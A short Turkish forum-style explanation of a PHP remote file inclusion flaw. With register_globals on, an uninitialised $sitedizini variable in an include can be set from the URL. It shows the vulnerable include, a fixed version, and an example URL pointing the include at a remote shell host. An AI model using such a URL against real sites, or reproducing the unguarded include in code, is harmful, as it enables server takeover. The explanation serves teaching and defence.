switch fonksiyonuyla dosya dahil etmekten kurtulamazlar
Şöyle bir dosya düşün alt.php
<? include $sitedizini."temalar/ih.html"; ?>
Aslında alt.php Dosyası Aşağıdaki gibi olsaydı sorun Olmazdı
//Config.php De $sitedizini diye bir değişkenin değerinin olduğunu var sayarak
<?
include "config.php";
include $sitedizini."temalar/ih.html";
?>
fakat
<? include $sitedizini."temalar/ih.html"; ?>
Kodlar bÖyle OLunca register_global'da On Olunca
$sitedizini
$_GET[sitedizini]
Şeklinde Çalışabildiği için
site.com/alt.php?sitedizini=http://www.remotem.com/albenibenshellim? Şeklinde zararlı Kod çalıştırıla bilinir